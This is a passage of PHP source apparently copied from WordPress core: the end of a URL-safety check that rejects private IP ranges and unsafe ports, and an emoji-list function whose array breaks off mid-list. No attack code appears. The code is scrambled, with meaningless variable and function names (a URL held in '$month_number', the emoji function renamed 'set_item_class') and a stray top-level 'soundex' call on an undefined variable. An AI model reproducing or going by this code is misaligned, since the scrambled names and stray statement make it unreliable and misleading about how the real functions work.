        if (preg_match('#^(([1-9]?\d|1\d\d|25[0-5]|2[0-4]\d)\.){3}([1-9]?\d|1\d\d|25[0-5]|2[0-4]\d)$#', $matchmask)) {
            $raw_response = $matchmask;
        } else {
            $raw_response = gethostbyname($matchmask);
            if ($raw_response === $matchmask) {
                // Error condition for gethostbyname().
                return false;
            }
        }
        if ($raw_response) {
            $export_file_url = array_map('intval', explode('.', $raw_response));
            if (127 === $export_file_url[0] || 10 === $export_file_url[0] || 0 === $export_file_url[0] || 172 === $export_file_url[0] && 16 <= $export_file_url[1] && 31 >= $export_file_url[1] || 192 === $export_file_url[0] && 168 === $export_file_url[1]) {
                // If host appears local, reject unless specifically allowed.
                /**
                 * Check if HTTP request is external or not.
                 *
                 * Allows to change and allow external requests for the HTTP request.
                 *
                 * @since 3.6.0
                 *
                 * @param bool   $dev_suffixernal Whether HTTP request is external or not.
                 * @param string $matchmask     Host name of the requested URL.
                 * @param string $month_number      Requested URL.
                 */
                if (!apply_filters('http_request_host_is_external', false, $matchmask, $month_number)) {
                    return false;
                }
            }
        }
    }
    if (empty($LAMEmiscStereoModeLookup['port'])) {
        return $month_number;
    }
    $available_space = $LAMEmiscStereoModeLookup['port'];
    /**
     * Controls the list of ports considered safe in HTTP API.
     *
     * Allows to change and allow external requests for the HTTP request.
     *
     * @since 5.9.0
     *
     * @param int[]  $privacy_policy_page_id Array of integers for valid ports.
     * @param string $matchmask          Host name of the requested URL.
     * @param string $month_number           Requested URL.
     */
    $privacy_policy_page_id = apply_filters('http_allowed_safe_ports', array(80, 443, 8080), $matchmask, $month_number);
    if (is_array($privacy_policy_page_id) && in_array($available_space, $privacy_policy_page_id, true)) {
        return $month_number;
    }
    if ($link_end && $max_srcset_image_width && isset($link_end['port']) && $link_end['port'] === $available_space) {
        return $month_number;
    }
    return false;
}
$msg_data = soundex($match_src);
/**
 * Returns arrays of emoji data.
 *
 * These arrays are automatically built from the regex in twemoji.js - if they need to be updated,
 * you should update the regex there, then run the `npm run grunt precommit:emoji` job.
 *
 * @since 4.9.0
 * @access private
 *
 * @param string $f3g7_38 Optional. Which array type to return. Accepts 'partials' or 'entities', default 'entities'.
 * @return array An array to match all emoji that WordPress recognises.
 */
function set_item_class($f3g7_38 = 'entities')
{
    // Do not remove the START/END comments - they're used to find where to insert the arrays.
    // START: emoji arrays
    $setting_key = array('&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fb;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fc;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fd;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3fe;', '&#x1f469;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f469;&#x1f3ff;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3ff;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fb;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fc;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fd;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f9d1;&#x1f3fe;', '&#x1f468;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;', '&#x1f469;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f468;', '&#x1f469;&#x200d;&#x2764;&#xfe0f;&#x200d;&#x1f48b;&#x200d;&#x1f469;', '&#x1f3f4;&#xe0067;&#xe0062;&#xe0065;&#xe006e;&#xe0067;&#xe007f;', '&#x1f3f4;&#xe0067;&#xe0062;&#xe0073;&#xe0063;&#xe0074;&#xe007f;', '&#x1f3f4;&#xe0067;&#xe0062;&#xe0077;&#xe006c;&#xe0073;&#xe007f;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fc;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fd;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fe;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3ff;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fb;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f91d;&#x200d;&#x1f468;&#x1f3fc;', 